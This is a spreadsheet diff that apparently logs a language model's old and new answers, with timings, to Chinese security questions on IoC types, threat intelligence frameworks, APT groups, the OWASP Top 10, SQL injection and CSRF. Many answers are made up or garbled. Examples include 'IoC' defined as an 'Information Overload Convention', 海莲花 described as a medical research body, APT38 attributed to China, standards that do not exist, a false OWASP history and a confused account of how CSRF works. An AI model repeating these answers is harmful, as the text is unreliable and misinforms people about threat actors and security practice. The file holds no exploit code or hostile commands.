+2. Phishing IoC：指的是恶意邮件或网站的特定特征或痕迹，如email地址、URL、标题等。
+3. Command and Control (C2) IoC：指的是恶意应用程序或服务器的特定特征或痕迹，如网络通信方式、命令格式等。
+4. User Account IoC：指的是恶意用户帐户的特定特征或痕迹，如帐户名称、密码、姓名等。
+5. Network Traffic IoC：指的是恶意网络流量的特定特征或痕迹，如网络包长度、包头等。
+6. System Configuration IoC：指的是恶意系统配置的特定特征或痕迹，如系统软件配置、系统服务配置等。
+7. Fileless Malware IoC：指的是无法找到于文件系统中的恶意软件或黑客工具的特定特征或痕迹，如执行文件、 registry 记录等。
+8. Living Off the Land (LOTL) IoC：指的是恶意软件或黑客工具使用系统内置软件和工具执行恶意操作的特定特征或痕迹，如PowerShell、Python等。
+9. Watering Hole IoC：指的是恶意网站或应用程序攻击者在特定网站或应用程序上执行恶意操作的特定特征或痕迹，如URL、cookie等。
+10. Insider Threat IoC：指的是内部攻击者在组织内部执行恶意操作的特定特征或痕迹，如用户帐户、权限等。
+这些IoC类型可以帮助预测和检测攻击的可能性，并且可以用于各种安全服务和监控系统中。</t>
         </is>
       </c>
       <c r="D23" t="n">
-        <v>14.7465353012085</v>
+        <v>16.60313105583191</v>
       </c>
     </row>
     <row r="24">
@@ -1071,23 +1077,23 @@
       </c>
       <c r="C24" t="inlineStr">
         <is>
-          <t>？
-ioc 是指 Information Overload Convention，即信息过载会议。它是一种描述现代社会信息过载的现象的术语，由 japanese 词汇 "ioc" 组成。
-ioc 通常指的是在社交媒体、新闻媒体和其他多个来源获取信息的过程中，人们受到过度信息的影响，导致感觉情绪失衡、情绪不稳定，甚至导致人们陷入情感压力或精神压力的状况。
-ioc 的主要症状包括：
-1. 信息过载：人们受到过多的信息和资讯，导致情感压力和精神压力。
-2. 信息难以识别：人们难以识别重要信息和不重要信息，导致情感压力和精神压力。
-3. 信息难以储存：人们难以储存和回忆信息，导致情感压力和精神压力。
-4. 情感不稳定：人们难以控制情感，导致情感压力和精神压力。
-对于 resolving ioc 的问题，可以通过以下方法：
-1. 减少信息获取：减少在社交媒体和新闻媒体获取信息的频率，以减轻情感压力和精神压力。
-2. 采用信息筛选技术：采用信息筛选技术，例如采用搜索引擎或信息管理软件，以帮助人们更好地识别重要信息和不重要信息。
-3. 增强情感管理能力：增强情感管理能力，例如通过冥想、瑜伽等方法，以帮助人们更好地控制情感。
-4. 建立休闲时间：建立休闲时间，例如做着读书、听音乐、运动等，以减轻情感压力和精神压力。&lt;/s&gt;</t>
+          <t>和why is it important for software development?
+ioc (Inversion of Control) is a software design pattern that allows you to separate the control of an application's flow of execution from its underlying logic. In other words, it's a way to decouple the control of an application's execution from its business logic.
+In an IoC system, the control of an application's flow of execution is handed over to a separate component, called an IoC container. The IoC container is responsible for managing the creation and lifecycle of objects, and for providing them to the application at the appropriate time. This allows the application to focus solely on its business logic, without worrying about the details of how the objects it needs are created and managed.
+IoC is important for several reasons:
+1. Loose Coupling: IoC helps to reduce coupling between components by abstracting away the creation and management of objects. This makes it easier to change or replace individual components without affecting the rest of the application.
+2. Improved Testability: With IoC, it's easier to write unit tests for individual components, as the dependencies of each component can be easily mocked or stubbed.
+3. Easier Deployment: IoC makes it easier to deploy applications by allowing you to swap out different implementations of objects without having to modify the rest of the application.
+4. Improved Maintainability: IoC makes it easier to change the behavior of an application by swapping out different implementations of objects, without having to modify the rest of the application.
+5. Better scalability: IoC makes it easier to scale applications by allowing you to add or remove instances of objects as needed, without having to modify the rest of the application.
+6. Simplified debugging: With IoC, it's easier to debug applications by being able to easily identify the root cause of a problem, as the dependencies of each component are managed by the IoC container.
+7. Improved Security: IoC makes it easier to manage security concerns by being able to easily swap out different implementations of objects that have security concerns.
+8. Improved reusability: IoC makes it easier to reuse code by being able to easily swap out different implementations of objects.
+In summary, IoC is important for software development because it helps to reduce coupling between components, improves testability, makes it easier to deploy and maintain applications, improves scalability, simplifies debugging, improves security, and improves reusability.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D24" t="n">
-        <v>16.54212665557861</v>
+        <v>11.73851323127747</v>
       </c>
     </row>
     <row r="25">
@@ -1101,21 +1107,22 @@
       </c>
       <c r="C25" t="inlineStr">
         <is>
-          <t>？  
-以下是一些常用的威胁情报标准或框架：
-1. NIST Cybersecurity Framework：美国国家标准技术研究院（NIST）提出的一套全面的威胁情报管理框架，包括以下四个层次：保护、特殊响应、快速响应和恢复。
-2. ISO 27001：国际标准组织（ISO）制定的一套标准，涵盖了威胁情报管理的概念、方法和技术。
-3. Cybersecurity Threat Intelligence Framework：由互联网安全中心（ISC）提出的一套威胁情报管理框架，包括以下三个层次：基础、中等和高级。
-4. Cyber Threat Intelligence (CTI) Framework：由国际电信联盟（ITU）提出的一套威胁情报管理框架，包括以下四个层次：预测、探测、识别和应对。
-5. MITRE ATT&amp;CK Framework：由mitre公司提出的一套威胁情报管理框架，用于识别和描述恶意软件的活动和行为。
-6. CSA STAR Framework：由 Cloud Security Alliance（CSA）提出的一套云安全管理框架，包括以下五个层次：基础、中等、高级、特殊响应和恢复。
-7. HMGCC Threat Intelligence Framework：英国政府的一套威胁情报管理框架，包括以下四个层次：情报收集、情报分析、情报应用和情报报告。
-8. Australian Government Cyber Security Centre (ACSC) Threat Intelligence Framework：澳大利亚政府的一套威胁情报管理框架，包括以下四个层次：基础、中等、高级和特殊响应。
-这些框架都是用于帮助组织管理和处理威胁情报的，但它们的内容和精度可能有所不同。选择适合自己的框架，并根据实际情况进行修改和补充。&lt;/s&gt;</t>
+          <t>There are several frameworks or standards for information security risk assessment. Here are some of the most widely used ones:
+1. NIST 800-30: Risk Management Guide for Information Technology Systems: This is a comprehensive framework for risk management developed by the National Institute of Standards and Technology (NIST). It provides a structured approach to risk assessment, including risk identification, assessment, and mitigation.
+2. ISO 27001: Information Security Management Systems (ISMS): This is an international standard for information security management systems (ISMS). It provides a framework for implementing and maintaining an ISMS, including risk assessment and management.
+3. COBIT: Control Objectives for Information and Related Technology: This is a framework for IT governance and management that includes a risk management component. It provides a set of best practices for managing and mitigating risks related to IT.
+4. COSO ERM: Enterprise Risk Management: This is a framework for enterprise risk management (ERM) developed by the Committee of Sponsoring Organizations (COSO). It provides a comprehensive approach to risk management, including risk identification, assessment, and mitigation.
+5. FAIR: Factor Analysis of Information Risk: This is a risk assessment framework that uses a mathematical approach to quantify and prioritize information security risks. It provides a structured approach to risk assessment and management.
+6. OCTAVE: Operationally Critical Threat, Asset, and Vulnerability Evaluation: This is a risk assessment framework developed by the SANS Institute. It provides a structured approach to risk assessment and management, including risk identification, assessment, and mitigation.
+7. CSA STAR: Cloud Security Alliance (CSA) Security, Trust &amp; Assurance Registry: This is a risk assessment framework specifically designed for cloud computing environments. It provides a structured approach to risk assessment and management, including risk identification, assessment, and mitigation.
+8. HIPAA: Health Insurance Portability and Accountability Act: This is a risk assessment framework specifically designed for healthcare organizations. It provides a structured approach to risk assessment and management, including risk identification, assessment, and mitigation.
+9. PCI DSS: Payment Card Industry Data Security Standard: This is a risk assessment framework specifically designed for organizations that handle credit card transactions. It provides a structured approach to risk assessment and management, including risk identification, assessment, and mitigation.
+10. ISO 22301: Business Continuity Management System (BCMS): This is a risk assessment framework specifically designed for business continuity management. It provides a structured approach to risk assessment and management, including risk identification, assessment, and mitigation.
+These are just a few examples of the many frameworks and standards available for information security risk assessment. It's important to choose a framework that aligns with your organization's specific needs and goals.</t>
         </is>
       </c>
       <c r="D25" t="n">
-        <v>17.69054007530212</v>
+        <v>14.6258761882782</v>
       </c>
     </row>
     <row r="26">
@@ -1129,23 +1136,20 @@
       </c>
       <c r="C26" t="inlineStr">
         <is>
-          <t>？ （APT38是一支恶名全球的跨国 cybercrime group，主要从事高级跟风险的攻击行为，包括跟风险钻取、執行黑客攻击、跟风险操作等。
-以下是APT38有哪些情报信息的一些细节：
-1. APT38的成员可能来自中国，但是具体情况尚不清楚。
-2. APT38通常使用跨越多个地区的黑客机构进行攻击，包括中国、美国、加拿大、澳大利亚和欧洲等地。
-3. APT38通常使用钻取技术来窃取目标公司的內部信息和数据，包括商业秘密、技术信息和个人隐私等。
-4. APT38也可能使用執行黑客攻击来窃取目标公司的网络和系统，包括绕过安全措施和破坏数据存储等。
-5. APT38可能与其他 cybercrime group 合作，以提高攻击效率和减轻巢穴压力。
-6. APT38的攻击范围非常广泛，涵盖多个行业和领域，包括银行、保险、能源、采购、制造、通信等。
-7. APT38通常使用跨越多个攻击阶段来实施攻击，包括钻取阶段、執行阶段和操作阶段。
-8. APT38可能使用不同的识别标志和攻击方法来逃避目标公司的安全措施和检测系统。
-9. APT38的攻击通常具有高度的技术和规模，使得目标公司的安全防范受到了严重的挑战。
-10. APT38的行为具有很强的商业和政治 направ合，可能是为了获取商业利益或满足政治目标而进行攻击。
-这些情报信息表明，APT38是一支非常高度技术和规模的 cybercrime group，可能来自中国，并且在全球范围内进行攻击。这些攻击可能具有商业和政治目标，并且可能与其他 cybercrime group 合作。因此，对于防范APT38的攻击，需要进行跨国和跨业的合作和协作，以确保企业和个人的数据安全。&lt;/s&gt;</t>
+          <t>APT38是一支中国国家级恶意软件开发团队，以下是一些关于APT38的情报信息：
+1. APT38是一支高级的恶意软件开发团队，主要为中国政府和企业提供威胁和情报收集服务。
+2. APT38的主要攻击目标包括美国、加拿大、澳大利亚、英国、法国、德国等国家的政府和企业，以及日本、韩国、新加坡等地的政府和企业。
+3. APT38使用了各种恶意软件和技术，包括针对 Window、Linux 和 macOS 操作系统的远程攻击软件、针对 Web 应用程序的攻击软件、针对 IoT 设备的攻击软件等。
+4. APT38通常会使用多种策略来访问攻击目标，包括针对特定个人或组织的诱降电子邮件、伪装为来电邮件或短信的恶意邮件、使用跟踪 cookies 和探查 HTTP 请求来监控和跟踪攻击目标等。
+5. APT38的攻击行为具有高度的自适应性和可变性，可以根据具体情况进行自适应，例如根据攻击目标的具体情况和安全情况进行不同的攻击策略。
+6. APT38的攻击具有很高的技术和经济价值，攻击的目标包括政府和企业的高级资源和技术，例如政府的国家安全机构、银行和证券交易所、实际控制的企业和技术研发中心等。
+7. APT38的攻击具有很高的隐蔽性和隐私性，攻击者可以使用各种隐蔽技术和策略来隐藏自己的身份和活动，例如使用跨域名称、域名解析、网络隐蔽等技术。
+8. APT38的攻击具有很高的可靠性和可重现性，攻击者可以使用各种备份和重新启动技术来确保攻击的可靠性和可重现性。
+这些情报信息都是关于APT38的一般情况和攻击方式，但是需要注意的是，这些信息并不能够确定APT38的实际目的和行为，这些信息的出处和可靠性也需要进行仔细分析和评估。</t>
         </is>
       </c>
       <c r="D26" t="n">
-        <v>19.83690237998962</v>
+        <v>21.03307628631592</v>
       </c>
     </row>
     <row r="27">
@@ -1159,14 +1163,17 @@
       </c>
       <c r="C27" t="inlineStr">
         <is>
-          <t>？
-海莲花是一个非营利性、独立的科学研究机构，成立于2016年。它的主要职责是研究和推广预防性医学和公共卫生，以降低人类伤害和疾病的风险。海莲花的研究领域包括疾病预防、卫生政策、医疗保健和公共卫生等。
-海莲花的研究方法包括自然科学、社会科学和医学领域的研究，以及与相关政府部门和卫生机构的合作。它还拥有一支职业的研究团队，其中包括医学家、生物学家、 statistics 专家、法律师和其他专业人士。
-海莲花的研究结果和建议通过各种渠道公开，包括学术期刊、会议、报告和新闻媒体等。同时，它也与各种卫生机构和组织合作，共同工作于预防性医学和公共卫生领域。&lt;/s&gt;</t>
+          <t>您好！我是 SeaLily，一个跨国的技术和产品开发公司。我们拥有一支多zetas的团队，擅长developing cutting-edge solutions for various industries. Our mission is to help businesses and individuals achieve their goals through innovative technology and products.
+At SeaLily, we believe in fostering a culture of collaboration, creativity, and mutual respect. We encourage our team members to share their ideas and perspectives, and provide them with the necessary resources and support to bring their visions to life.
+Our company is committed to delivering high-quality products and services that exceed our clients' expectations. We strive to create long-term relationships with our clients and partners, and to continuously improve our offerings based on their feedback.
+Thank you for considering SeaLily as your technology and product development partner. We look forward to working with you!
+Best regards,
+[Your Name]
+SeaLily Team</t>
         </is>
       </c>
       <c r="D27" t="n">
-        <v>8.830362558364868</v>
+        <v>5.158828735351562</v>
       </c>
     </row>
     <row r="28">
@@ -1180,20 +1187,14 @@
       </c>
       <c r="C28" t="inlineStr">
         <is>
-          <t>？
-Equation Group是一个由美国国家安全委员会（NSA）和其他一些国家的安全情报机构共同组织的secretive group。该组织的目的是为了研究和应对最新的数学和科学技术，以及其在安全和国家安全方面的应用。
-Equation Group的成员包括NSA、美国国防部、CIA、FBI、美国国家卫生 Institut (NIH)等机构，以及一些来自学术界和industry的 эксперts。这些机构和专家共同工作，以提高对数学和科学技术的理解，并将这些技术应用于安全和国家安全方面。
-Equation Group的活动主要包括：
-1. 研究和分析最新的数学和科学技术，如 cryptography、computer science、artificial intelligence等。
-2. 开发新的数学和科学技术，以满足美国国家安全和国家安全需求。
-3. 与其他国家和国际组织合作，共同研究和应用数学和科学技术。
-4. 提供指导和支持 для美国国内和国际学术界的研究和发展。
-Equation Group的活动秘密性非常强，很难获知具体的信息。然而，一些泄露文档和媒体报道表明，Equation Group可能涉及到一些高级的数学和科学技术，如泛函分析、代数几何、分子生物学等。
-总之，Equation Group是一个秘密的国家安全机构，负责研究和应用最新的数学和科学技术，以保障美国国家安全和国家安全需求。尽管具体情况隐蔽，但Equation Group的存在和作用都是一个不可 ignore的话题。&lt;/s&gt;</t>
+          <t>Equation Group是一个黑客组织，成员包括安全 experts，攻击ers，和数据分析师。它的主要目标是让企业和政府层面隐私和安全。Equation Group的成员使用了一些特殊的技术和工具来实现这个目标，其中包括一些未知的攻击工具和技术。
+Equation Group的历史可以追溯到2001年，是一个由美国国家安全委员会（NSA）内的一个小组成员而成的团队。该组织的成员来自NSA和其他美国政府机构，以及一些来自private sector的技术人员。Equation Group的主要任务是评估和预测潜在威胁，并提供相关的防范和应对策略。
+Equation Group的活动已经被证明对企业和政府有很大影响，他们通过检测和破坏敏感数据和系统来保护潜在威胁。Equation Group的成员通常使用匿名的帐户和渠道来进行活动，并且他们的活动很隐蔽，因此很难追踪和检测。
+总之，Equation Group是一个具有强大技术和资源的黑客组织，他们通过让企业和政府层面隐私和安全来实现其主要目标。</t>
         </is>
       </c>
       <c r="D28" t="n">
-        <v>13.15031409263611</v>
+        <v>11.12262606620789</v>
       </c>
     </row>
     <row r="29">
@@ -1207,20 +1208,19 @@
       </c>
       <c r="C29" t="inlineStr">
         <is>
-          <t>协议？  
-威胁情报标准协议（TiSA）是一种国际标准，用于确定如何进行威胁情报分享和互相预警。以下是一些常见的威胁情报标准协议：
-1. NFPA 101：由美国国家防火协会（NFPA）制定的标准，用于确定威胁情报的共享和分享标准。
-2. ISO 29100：由国际标准技术委员会（ISO）制定的标准，用于确定威胁情报的分享和互相预警的标准。
-3. EU-DS 98/24：由欧洲union（EU）制定的标准，用于确定威胁情报的分享和互相预警的标准。
-4. CSA Standard 946：由加拿大安全协会（CSA）制定的标准，用于确定威胁情报的分享和互相预警的标准。
-5. AS/NZS 4360：由澳大利亚标准协会（AS）和维多利亚标准协会（NZS）制定的标准，用于确定威胁情报的分享和互相预警的标准。
-6. BS 7799-3：由英国标准协会（BS）制定的标准，用于确定威胁情报的分享和互相预警的标准。
-7. ANSI/ASIS PSC.1-2012：由美国国家协会（ANSI）和安全协会（ASIS）制定的标准，用于确定威胁情报的分享和互相预警的标准。
-这些标准都是针对威胁情报分享和互相预警的，它们提供了一系列的规定和指导，以确保威胁情报的分享和互相预警的安全性和可靠性。&lt;/s&gt;</t>
+          <t>1. ISO 27001：2013：针对信息安全管理制定的国际标准，涵盖了信息安全管理系统的设计、实施、维护和升级等方面。
+2. NIST Cybersecurity Framework：2018：由美国国家标准技术研究所（NIST）制定的审查和评估信息安全风险和责任的框架，涵盖了五个领域：保护、发现、评估、Response和Recovery。
+3. ISO 27002：2013：针对信息安全管理的技术和实践方面的国际标准，涵盖了信息安全管理系统的设计、实施、维护和升级等方面。
+4. COBIT：2019：针对信息安全管理和 IT Governance的国际标准，涵盖了信息安全管理系统的设计、实施、维护和升级等方面。
+5. SOC 2：2018：针对云计算服务 provider的信息安全管理和控制标准，涵盖了 cloud 安全的设计、实施、维护和升级等方面。
+6. HITRUST CSF：2019：针对医疗保健机构的信息安全管理和控制标准，涵盖了医疗保健机构的信息安全管理系统的设计、实施、维护和升级等方面。
+7. PCI DSS：2019：针对payment card industry（银行卡业）的信息安全管理和控制标准，涵盖了银行卡payment card industry的信息安全管理系统的设计、实施、维护和升级等方面。
+8. GDPR：2018：针对欧盟个人隐私保护法（GDPR）的信息安全管理和控制标准，涵盖了个人隐私保护和信息安全管理的设计、实施、维护和升级等方面。
+这些标准都是针对不同领域和应用的，选择适用的标准可以帮助组织实现信息安全管理的目标。</t>
         </is>
       </c>
       <c r="D29" t="n">
-        <v>16.52674746513367</v>
+        <v>17.31554341316223</v>
       </c>
     </row>
     <row r="30">
@@ -1234,24 +1234,25 @@
       </c>
       <c r="C30" t="inlineStr">
         <is>
-          <t>？ 
-OWASP TOP 10是一份顺序列表，用于描述了 web 应用程序软件安全的十大主要攻击风险。OWASP TOP 10 由以下几个主要领域组成：
-1. Injection
-2. Broken Authentication and Session Management
-3. Cross-Site Scripting (XSS)
-4. Cross-Site Request Forgery (CSRF)
-5. Insecure Direct Object Reference (IDOR)
-6. Broken Access Control
-7. Security Misconfiguration
-8. Sensitive Data Exposure
-9. Missing Function Level Access Control
-10. Using Components with Known Vulnerabilities
-OWASP TOP 10 是一个指导性的列表，它提供了优先级高的安全攻击风险，以便开发人员和安全专业人员可以更好地识别和应对可能的攻击。
-&lt;/s&gt;</t>
+          <t>OWASP TOP 10是什么？
+OWASP TOP 10是什么？
+OWASP TOP 10是一份由伯特•奥布赖恩和戴夫•瑞弗•詹姆斯•索耶•塞缪尔•迪特•卢卡•詹姆斯•布雷特等人于2003年共同编写的一份开放源代码的安全评估指南。它定期会对当前的安全漏洞和攻击方式进行评估，并提供可行的风险评估和风险控制策略。OWASP TOP 10 分为了10个方面，每个方面都有10个安全漏洞和攻击方式，总共有100个安全漏洞和攻击方式。
+OWASP TOP 10的方面和安全漏洞如下：
+1. Injection（注入）：在应用程序中的数据注入漏洞，包括数据Base64解码、SQL注入、HTML注入等。
+2. Broken Authentication and Session Management（破坏的身份验证和会话管理）：应用程序的身份验证和会话管理不当，导致访问权限随着用户名和密码而变化。
+3. Cross-Site Scripting (XSS)（跨站脚本攻击）：应用程序中的跨站脚本攻击漏洞，可以让攻击者在用户的浏览器中执行任意代码。
+4. Insecure Direct Object Reference（ direkt 对象引用不安全）：应用程序中的对象引用不安全，攻击者可以通过利用对象的引用来访问不应该访问的数据。
+5. Broken Access Control（裁剪控制不当）：应用程序的访问控制不当，导致权限不受限制，或者权限不够强制。
+6. Security Misconfiguration（安全配置不当）：应用程序的安全配置不当，导致漏洞和攻击潜在。
+7. Sensitive Data Exposure（敏感数据暴露）：应用程序中的敏感数据暴露，可以让攻击者获得敏感信息。
+8. Missing Function Level Access Control（缺失的函数级别访问控制）：应用程序中缺失的函数级别访问控制，导致权限不受限制，或者权限不够强制。
+9. Cross-Site Request Forgery (CSRF)（跨站请求伪造）：应用程序中的CSRF攻击漏洞，可以让攻击者通过用户的浏览器来执行无法让用户直接执行的操作。
+10. Using Components with Known Vulnerabilities（使用知道漏洞的组件）：应用程序中使用知道漏洞的组件，可以让攻击者利用这些漏洞进行攻击。
+OWASP TOP 10 是一份非常有价值的安全评估指南，可以帮助开发人员和安全人员了解和评估应用程序的安全漏洞和攻击方式，并采取适当的风险评估和风险控制策略。</t>
         </is>
       </c>
       <c r="D30" t="n">
-        <v>6.206902980804443</v>
+        <v>24.97901773452759</v>
       </c>
     </row>
     <row r="31">
@@ -1265,24 +1266,22 @@
       </c>
       <c r="C31" t="inlineStr">
         <is>
-          <t>？  
-在Web应用程序中，可能会存在漏洞，这是因为Web应用程序是基于HTTP协议，HTTP协议是一种无安全的协议，攻击者可以使用各种攻击方式，如端到端攻击、中间人攻击等，以便破坏Web应用程序的安全性。
-下面是一些常见的Web漏洞：
-1. SQL注入：在Web应用程序中，可能会使用SQL语句来处理数据的存储和 Retrieval。如果不正确地编写SQL语句，可能会导致数据泄露或者不正确的数据返回。
-2. Cross-Site Scripting(XSS)：XSS攻击者可以 inject  malicious  JavaScript  code into a website，使其 executed  on the user's  browser，从而让用户的屏幕呈现非法的内容。
-3. Cross-Site Request Forgery(CSRF)：CSRF攻击者可以 trick  user  into performing unintended actions on a website，例如转账资金或者更改个人资料。
-4. File Inclusion Vulnerabilities：File inclusion vulnerabilities  occur when an attacker is able to include malicious files or code into a website，leading to unauthorized access or data tampering.
-5. Buffer Overflow：Buffer overflow vulnerabilities  occur when an attacker is able to overflow a buffer with malicious data，leading to code execution or data tampering.
-6. Authentication Bypass：Authentication bypass vulnerabilities  occur when an attacker is able to bypass authentication mechanisms and gain unauthorized access to a website or its resources.
-7. Input Validation weaknesses：Input validation weaknesses  occur when an attacker is able to submit malicious input data to a website，leading to data tampering or other security issues.
-8. Session Management weaknesses：Session management weaknesses  occur when an attacker is able to manipulate or exploit session ID to gain unauthorized access or perform unintended actions on a website.
-9. Password Storage weaknesses：Password storage weaknesses  occur when an attacker is able to access or manipulate user passwords, leading to unauthorized access or data tampering.
-10. Third Party Component vulnerabilities：Third party component vulnerabilities  occur when an attacker is able to exploit vulnerabilities in third-party components or libraries used by a website, leading to unauthorized access or data tampering.
-这些漏洞可能会被攻击者利用，从而让Web应用程序中的数据泄露或者访问权限受到攻击。因此，在Web应用程序开发中，应该关注安全性，并采取相应的措施来遏制攻击。&lt;/s&gt;</t>
+          <t>Web漏洞是指在Web应用程序中存在的一些漏洞或漏洞，这些漏洞可以让攻击者绕过安全措施，进行恶意访问或攻击。以下是一些可能导致Web漏洞的原因：
+1. 缺乏安全检查：Web应用程序可能不具备对用户input数据进行安全检查，导致攻击者可以通过发送特定的input数据来trigger漏洞。
+2. 不够安全的Session管理：Web应用程序可能不够安全地管理会话，导致攻击者可以通过Session權限重新设置或窃取Session数据。
+3. 不够安全的Cookie管理：Web应用程序可能不够安全地管理Cookie，导致攻击者可以通过Cookie權限重新设置或窃取Cookie数据。
+4. 欠如访问控制：Web应用程序可能不具备对用户访问控制，导致攻击者可以访问不受授权的页面或数据。
+5. 不够安全的数据存储：Web应用程序可能不具备对数据存储的安全措施，导致攻击者可以窃取或修改数据。
+6. 不够安全的数据传输：Web应用程序可能不具备对数据传输的安全措施，导致攻击者可以窃取或修改数据。
+7. 缺乏安全扫描：Web应用程序可能不具备对代码和数据进行安全扫描，导致攻击者可以窃取或修改代码或数据。
+8. 不够安全的扩展：Web应用程序可能不具备对扩展的安全措施，导致攻击者可以窃取或修改扩展。
+9. 不够安全的数据库：Web应用程序可能不具备对数据库的安全措施，导致攻击者可以窃取或修改数据库。
+10. 不够安全的应用程序代码：Web应用程序可能不具备对应用程序代码的安全措施，导致攻击者可以窃取或修改应用程序代码。
+这些原因可能会导致Web漏洞，这些漏洞可以被攻击者利用，以便进行恶意访问或攻击。因此，它非常重要确保Web应用程序的安全性，并定期检查和修复漏洞。</t>
         </is>
       </c>
       <c r="D31" t="n">
-        <v>16.92095947265625</v>
+        <v>19.37726497650146</v>
       </c>
     </row>
     <row r="32">
@@ -1296,23 +1295,21 @@
       </c>
       <c r="C32" t="inlineStr">
         <is>
-          <t>？
-SQL注入是指通过 inserted 语句中的用户提供的输入来执行SQL语句的攻击方式。通常，在Web应用程序中，用户可以输入需要执行的SQL语句，但是如果用户输入了可疑的或恶意的内容，那么这种攻击就可能会产生危害。
-SQL注入的危害主要来自于用户可以通过输入SQL语句来访问和修改数据库中的数据。如果用户可以访问和修改其他用户的数据，那么这可能会导致数据库的安全问题。此外，SQL注入还可以用于执行恶意的操作，如delete 操作可以 Delete 整个数据库中的数据，或者更改数据库的结构等。
-为了防止SQL注入，通常情况下会采用以下方法：
-1. 对用户输入的 validate：通过验证用户输入的内容，以确保它们是有效的和合法的SQL语句。
-2. 使用 parameterized queries：使用已编译好的SQL语句，而不是以用户输入来构造SQL语句。
-3. 使用prepared statements：使用特定的SQL语句，而不是以用户输入来构造SQL语句。
-4. 使用SQL安全措施：使用特定的SQL安全措施，如Limit 查询，防止攻击者访问整个数据库。
-5. 使用Firewall和安全检查：使用Firewall和安全检查来防止攻击者访问数据库。
-6. 使用数据库隐藏：使用数据库隐藏来隐藏数据库的存在和访问方式。
-7. 使用访问控制：使用访问控制来限制用户访问数据库的权限。
-8. 使用数据库访问控制：使用数据库访问控制来限制用户访问数据库中的具体数据。
-总之，防止SQL注入需要在Web应用程序中采用多种方法，包括验证用户输入、使用parameterized queries、使用prepared statements、使用SQL安全措施、使用Firewall和安全检查、使用数据库隐藏、使用访问控制和数据库访问控制等。&lt;/s&gt;</t>
+          <t>SQL 注入（SQL Injection）是一种 web 攻击方式，通过使用malicious SQL code to manipulate a web application's database， obtain sensitive information or escalate privileges。
+Here are some common ways to protect yourself against SQL injection:
+1. Use parameterized queries: Instead of inserting user input directly into your SQL queries, use parameterized queries that separate the input from the SQL code. This makes it difficult for an attacker to inject malicious SQL code.
+2. Validate user input: validate all user input to ensure it is in the correct format and does not contain any malicious code.
+3. Use prepared statements: Prepared statements are a type of parameterized query that can simplify the process of protecting against SQL injection. They allow you to pre-compile the SQL code and bind parameters, making it more difficult for an attacker to inject malicious code.
+4. Limit privileges: Limit the privileges of the user account that is accessing the database to only what is necessary to perform the required actions.
+5. Use a web application firewall (WAF): A WAF can help protect your web application from SQL injection attacks by filtering incoming traffic and blocking any suspicious requests.
+6. Keep your software up-to-date: Keeping your web application and database software up-to-date can help protect against known vulnerabilities that could be exploited by an attacker.
+7. Use a secure coding practices: Use secure coding practices such as input validation, error handling, and secure data storage to protect against SQL injection.
+8. Use a database encryption: Encrypting the data in the database can help protect against SQL injection attacks by making it difficult for an attacker to read or manipulate the data.
+It's important to note that SQL injection is a serious security threat, and it's important to take the necessary steps to protect your web application and database from this type of attack.</t>
         </is>
       </c>
       <c r="D32" t="n">
-        <v>16.96151542663574</v>
+        <v>9.059506416320801</v>
       </c>
     </row>
     <row r="33">
@@ -1326,17 +1323,23 @@
       </c>
       <c r="C33" t="inlineStr">
         <is>
-          <t>？
-CSRF（Cross-Site Request Forgery）是一种Web攻击，通过模拟用户的动作，让用户未经授权的访问和修改某个网站或应用程序的数据。
-CSRF攻击的原理是利用Web端的POST请求方法，即使用户没有在浏览器中点击相应的按钮，但是可以通过模拟用户的动作，向Web端发送POST请求，达到模拟用户的操作效果。
-在CSRF攻击中，攻击者需要知道目标Web站点的响应式URL，并在浏览器中模拟用户的POST请求，将请求数据包含在HTML Form上。当用户在浏览器中点击相应的按钮时，Web端会将请求数据包含在POST请求中，并将其发送到服务器进行处理。
-因此，CSRF攻击可以使用用户未经授权的POST请求来修改、删除或添加数据，从而让用户未经授权地执行某些操作。
-为了防止CSRF攻击，一般会在Web应用程序中添加一个token或nonce，这个 token 或nonce 将会在每次请求时包含在请求头中，以便在Web端接收到请求时，可以检查是否是从用户的浏览器发送的请求，而不是从攻击者的浏览器。如果检查到不同的token 或nonce ，则认为是攻击者的请求，并拒绝其。
-总之，CSRF原理是利用Web端的POST请求方法，模拟用户的动作，让用户未经授权的访问和修改某个网站或应用程序的数据。为了防止CSRF攻击，可以添加token或nonce，并在Web端接收到请求时检查其来确保来自用户的请求。&lt;/s&gt;</t>
+          <t>CSRF（Cross-Site Request Forgery）是一种攻击方式，使用户的别名或Cookies等信息，通过网站的跨域请求，执行别人的操作，从而让用户的操作受到了攻击。
+CSRF的原理是：
+1. 攻击者在受害者的域名下注入一个跨域请求，以便在受害者的账户上进行操作。
+2. 攻击者在跨域请求中包含一个token，该token可以是一个Cookie、一个 hidden 字段等。
+3. 受害者访问受害者的账户，并在访问时将token绑定到受害者的请求中。
+4. 攻击者在受害者的账户上进行操作，并将操作带有token，从而让受害者的操作被认为是受害者的操作。
+例如，您在某个网站上注册了一个帐户，并在浏览器的地址栏中输入了该网站的URL。然后，您在受害者的网站上访问了一个页面，并在该页面中输入了一个受害者的帐户信息，例如 username 和 password。攻击者可以在受害者的网站上注入一个跨域请求，以便在您的帐户上进行操作。
+为了防止CSRF攻击，可以采取以下措施：
+1. 使用Token防止CSRF：在受害者的账户上注入一个Token，并在受害者的请求中包含该Token。
+2. 使用SameOriginPolicy防止CSRF：在浏览器中设置SameOriginPolicy，以便只允许受害者的域名进行操作。
+3. 使用Content-Security-Policy防止CSRF：在受害者的网站上设置Content-Security-Policy，以便只允许受害者的域名进行操作。
+4. 使用严格模式防止CSRF：在浏览器中设置严格模式，以便只允许受害者的域名进行操作。
+总之，CSRF攻击是一种常见的攻击方式，可以通过注入跨域请求来冒充受害者的帐户，从而让受害者的操作受到攻击。为了防止CSRF攻击，可以采取多种措施，例如使用Token、SameOriginPolicy、Content-Security-Policy和严格模式等。</t>
         </is>
       </c>
       <c r="D33" t="n">
-        <v>14.27388763427734</v>
+        <v>20.03567576408386</v>
       </c>
     </row>
     <row r="34">
@@ -1350,14 +1353,17 @@
       </c>
       <c r="C34" t="inlineStr">
         <is>
-          <t>？
-逻辑漏洞是指在一个逻辑系统中存在的一些错误或不准确的处理方式，导致系统的决策或行动不当。逻辑漏洞可以是词义漏洞、逻辑逻辑漏洞、假设漏洞等，其中词义漏洞是指系统不能准确地理解用户的需求或意图，逻辑逻辑漏洞是指系统中的逻辑不准确或不完整，而假设漏洞是指系统假设了一些不存在的实际或情况。
-逻辑漏洞的出现可以是由于各种因素，如人工智能算法的不善、数据质量不佳、系统的设计或实现不具备、用户 Input 的不准确等。在实际应用中，逻辑漏洞可能会导致系统做出不良决策或行动，如预测模型的误判、自动驾驶车的冒泡、智能助手的错误提示等。
